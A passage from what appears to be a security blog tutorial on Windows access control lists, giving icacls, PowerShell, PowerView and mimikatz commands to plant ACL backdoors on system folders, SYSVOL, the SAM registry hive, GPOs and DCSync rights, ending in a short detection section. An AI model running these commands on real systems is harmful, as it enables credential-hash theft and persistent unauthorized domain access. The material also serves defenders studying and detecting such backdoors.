defensive perspective, if a system is compromised, finding and removing ACL backdoors left by attackers also requires a certain understanding of ACL.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>ACL-related concepts\u003C\u002Fli>\u003Cli>Viewing ACL\u003C\u002Fli>\u003Cli>ACL exploitation (files, registry, and domain environments)\u003C\u002Fli>\u003Cli>ACL detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 ACL-related concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FSecAuthZ\u002Faccess-control-lists\u003C\u002Fp>\u003Ch4>ACL:\u003C\u002Fh4>\u003Cp>Access Control List, a list used to represent user (group) permissions, including DACL and SACL\u003C\u002Fp>\u003Ch4>ACE:\u003C\u002Fh4>\u003Cp>Access Control Entry, an element within an ACL\u003C\u002Fp>\u003Ch4>DACL:\u003C\u002Fh4>\u003Cp>Discretionary Access Control List, a list used to represent permissions for a security object\u003C\u002Fp>\u003Ch4>SACL:\u003C\u002Fh4>\u003Cp>System Access Control List, used to log access to a security object\u003C\u002Fp>\u003Ch4>Intuitive understanding:\u003C\u002Fh4>\u003Cp>ACLs are used in the Windows access control model, such as permissions for files and registries, to indicate which users (groups) have operational permissions\u003C\u002Fp>\u003Cp>For example, when accessing a file, the system will make the following judgments:\u003C\u002Fp>\u003Cul>\u003Cli>If there is no DACL, the system will allow access\u003C\u002Fli>\u003Cli>If a DACL exists but has no ACEs, the system will deny all access\u003C\u002Fli>\u003Cli>If a DACL exists and ACEs are present, each ACE specifies either allow or deny permissions.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Example demonstration\u003C\u002Fh3>\u003Cp>For the folder C:\\Windows\\SYSVOL\\sysvol\\test.com, view folder properties\u003C\u002Fp>\u003Cp>By default, there are five DACLs, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019792499_0_b63f250865-1.jpeg\">\u003C\u002Fp>\u003Cp>Select one DACL, which contains multiple ACEs, indicating the permissions granted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019800895_1_a9db3ccfbf-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 ACLs in files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (icacls):\u003C\u002Fh3>\u003Ch4>1. View the ACL of a specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019814348_2_56d0ddb9c7-1.jpeg\">\u003C\u002Fp>\u003Ch4>2. Back up the ACL of a specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fsave AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Restore ACL for specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\ \u002Frestore AclFile \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When restoring, the path needs to be set to the parent directory\u003C\u002Fp>\u003Ch4>4. Add full access permissions for user test1 to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fgrant test1:(OI)(CI)(F) \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(OI) stands for Object Inherit\u003C\u002Fp>\u003Cp>(CI) stands for Container Inherit\u003C\u002Fp>\u003Cp>(F) stands for Full Access\u003C\u002Fp>\u003Ch4>5. Remove full access permissions for user test1 from specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>icacls C:\\Windows\\SYSVOL\\sysvol\\test.com \u002Fremove test1 \u002Ft\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>For example, C:\\Windows\\SYSVOL\\sysvol\\test.com\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'| Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Add full access permissions for user test1 to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Remove user test1's full access permissions to the specified file\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to the specified file (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-ACL{\u003Cbr>    [CmdletBinding()]           \u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.AddAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    $file.fullname\u003Cbr>    Add-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove user test1's full access permissions to specified files (including files in the current directory and its subdirectories)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Remove-ACL{\u003Cbr>    [CmdletBinding()]\u003Cbr>    Param (\u003Cbr>        [Parameter(Mandatory = $True)]\u003Cbr>        [String]\u003Cbr>        [ValidateNotNullOrEmpty()]\u003Cbr>        $Path\u003Cbr>    )\u003Cbr>\u003Cbr>    $acl = Get-Acl -Path $Path\u003Cbr>    $person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>    $access = [System.Security.AccessControl.FileSystemRights]\"FullControl\"\u003Cbr>    $inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>    $propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>    $type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule( `\u003Cbr>    $person,$access,$inheritance,$propagation,$type)\u003Cbr>    $acl.RemoveAccessRule($rule)\u003Cbr>    Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Remove-ACL -Path 'C:\\Windows\\SYSVOL\\sysvol\\test.com'\u003Cbr>$fileList = Get-ChildItem 'C:\\Windows\\SYSVOL\\sysvol\\test.com' -recurse\u003Cbr>Foreach($file in $fileList)\u003Cbr>{\u003Cbr>    Remove-ACL -Path $file.fullname\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. Local Privilege Escalation Backdoor\u003C\u002Fh4>\u003Cp>After obtaining administrator privileges on a Windows system, modify the ACL of system directories to grant full access to regular users, creating a privilege escalation backdoor.\u003C\u002Fp>\u003Cp>Subsequently, elevate from a regular user to administrator privileges through various methods such as DLL hijacking or file replacement.\u003C\u002Fp>\u003Ch4>2. Modification of GPO in Domain Environment\u003C\u002Fh4>\u003Cp>Modify the ACL of the domain shared folder \\\\\u003Cdomain>\\SYSVOL\\\u003Cdomain>\\ to grant full access to regular users.\u003C\u002Fdomain>\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>Subsequently, use the privileges of a regular domain user to modify the domain's GPO, alter scheduled tasks within the GPO, and achieve remote execution of scheduled tasks.\u003C\u002Fp>\u003Cp>For related methods, refer to the previous article 'Domain Penetration – Remote Execution via Scheduled Tasks in GPO'.\u003C\u002Fp>\u003Ch4>3. Domain ordinary user reads all user hashes within the domain\u003C\u002Fh4>\u003Cp>Create file sharing for ntds.dit, add ACL\u003C\u002Fp>\u003Cp>Subsequently, domain ordinary users can access the domain controller's ntds.dit file to read all user hashes within the domain\u003C\u002Fp>\u003Ch2>0x04 ACL in the Registry\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Ch4>1. View ACL for a specified path\u003C\u002Fh4>\u003Cp>e.g., HKEY_LOCAL_MACHINE\\SAM\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path 'HKLM:\\SAM' | Format-Table -wrap\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019825851_3_5509259ae4-1.jpeg\">\u003C\u002Fp>\u003Cp>Obtain specific content of the Access item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl -Path 'HKLM:\\SAM'\u003Cbr>$acl.Access\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019837440_4_cd1dbf9e34-1.jpeg\">\u003C\u002Fp>\u003Ch4>2. Grant user test1 full access to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\" indicates that subkeys inherit permissions from the current registry key\u003C\u002Fp>\u003Cp>Modifying the ACL of registry key HKLM:\\SAM requires Administrator privileges\u003C\u002Fp>\u003Cp>Modifying the ACL of the registry key HKLM:\\SAM\\SAM requires System privileges\u003C\u002Fp>\u003Ch4>3. Remove the full access permission of user test1 to the specified path (including the current registry key and its subkeys)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:\\SAM\u003Cbr>$person = [System.Security.Principal.NTAccount]\"test1\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.RemoveAccessRule($rule)\u003Cbr>Set-Acl HKLM:\\SAM $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation approach:\u003C\u002Fh3>\u003Ch4>1. Local privilege escalation backdoor\u003C\u002Fh4>\u003Cp>Modify the registry keys HKLM:\\SAM and HKLM:\\SYSTEM to add full access permissions for ordinary users\u003C\u002Fp>\u003Cp>Ordinary users can obtain the hashes of all local users through registry entries, thereby gaining administrator privileges\u003C\u002Fp>\u003Ch4>3. Local Auto-start Backdoor\u003C\u002Fh4>\u003Cp>Modify registry locations to add startup items or hijack entries\u003C\u002Fp>\u003Ch2>0x05 ACL in Domain Environment\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Implemented through Active Directory Service Interfaces (ADSI)\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FAD\u002Fcontrolling-access-to-objects-in-active-directory-domain-services\u003C\u002Fp>\u003Cp>Reference for calling ADSI with PowerShell:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsocial.technet.microsoft.com\u002FForums\u002Fwindowsserver\u002Fen-US\u002Fdf3bfd33-c070-4a9c-be98-c4da6e591a0a\u002Fforum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell\u003C\u002Fp>\u003Ch3>Common commands (PowerShell):\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerView has already implemented this part, so this section directly references the functionality in PowerView\u003C\u002Fp>\u003Cp>Code repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Ch4>1. Obtain all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObject -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Obtain the ACLs of all objects in the current domain\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainObjectAcl -Domain test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Obtain the ACL of a specified user\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-DomainUser test1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Add full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>5. Remove full access permissions for user test1 to a specified object (guid)\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity '483e9973-2d45-4e2f-b034-f272a26950e0' -PrincipalIdentity test1 -Rights All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Exploitation Approach:\u003C\u002Fh3>\u003Ch4>1. DCSync Backdoor\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is learned from: https:\u002F\u002Fwww.specterops.io\u002Fassets\u002Fresources\u002Fan_ace_up_the_sleeve.pdf\u003C\u002Fp>\u003Cp>DCSync is a feature of mimikatz that can simulate a domain controller and export account password hashes from the domain controller\u003C\u002Fp>\u003Cp>If we obtain domain administrator privileges on a host within the domain, we can use the following command to directly export the hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, only Domain Controllers and Enterprise Domain Admins have the permissions to use DCSync.\u003C\u002Fp>\u003Cp>However, we can add ACLs to DS-Replication-GetChanges (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2), enabling ordinary users to invoke DCSync and export the hashes of all users in the domain.\u003C\u002Fp>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>The command to add the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, on a host within the domain where the test1 user is logged in, we can use the DCSync feature of mimikatz.\u003C\u002Fp>\u003Cp>The command to remove the ACL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. GPO Backdoor\u003C\u002Fh4>\u003Cp>(1) View the GPOs in the current domain\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module GroupPolicy\u003Cbr>Get-GPO -All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below, TestGPO is one I added myself in the test environment, while Default Domain Policy and Default Domain Controllers Policy are GPOs that exist by default in the domain environment\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019858190_5_62de6f01db-1.jpeg\">\u003C\u002Fp>\u003Cp>(2) Add full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Remove full access permissions for user test1 to TestGPO\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RawObject = Get-DomainGPO -Raw -Identity 'TestGPO'\u003Cbr>$TargetObject = $RawObject.GetDirectoryEntry()\u003Cbr>$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity test1 -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty\u003Cbr>$TargetObject.PsBase.ObjectSecurity.RemoveAccessRule($ACE)\u003Cbr>$TargetObject.PsBase.CommitChanges()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Subsequent operations can be performed on GPOs to add scheduled tasks, enabling remote execution of scheduled tasks. For specific methods, refer to the previous article 'Domain Penetration - Utilizing Scheduled Tasks in GPOs for Remote Execution'.\u003C\u002Fp>\u003Ch2>0x06 ACL Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>1. Files and Registry\u003C\u002Fh4>\u003Cp>Open-source tools such as WindowsDACLEnumProject can be utilized:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnccgroup\u002FWindowsDACLEnumProject\u003C\u002Fp>\u003Cp>Capable of listing risky ACLs.\u003C\u002Fp>\u003Ch4>3. Domain Environment\u003C\u002Fh4>\u003Cp>Advanced security audit policies need to be enabled. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Fcanitpro\u002F2017\u002F03\u002F29\u002Fstep-by-step-enabling-advanced-security-audit-policy-via-ds-access\u002F\u003C\u002Fp>\u003Cp>After enabling the policy, Event ID 5136 will record ACL modifications in the domain environment. Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.ultimatewindowssecurity.com\u002Fsecuritylog\u002Fencyclopedia\u002Fevent.aspx?eventid=5136\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces techniques for exploiting ACLs in Windows systems for backdoor purposes in file systems, registry, and domain environments, along with suggestions for detecting such backdoors.\u003C\u002Fp>\u003Cp>I have learned a lot about ACLs in domain environments from PowerView and would like to thank the author for open-sourcing it.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1547,"Onedaysec",8,"published","2026-02-02T08:19:47.662Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Windows ACL Penetration Testing: Access Control List Exploitation","Windows ACL, Access Control List, penetration testing, privilege escalation, backdoor exploitation, DACL, SACL, icacls, PowerShell ACL",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],187,186,185,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.832Z","2026-07-23T16:01:09.294Z","draft","2026-07-23T16:04:23.252Z"]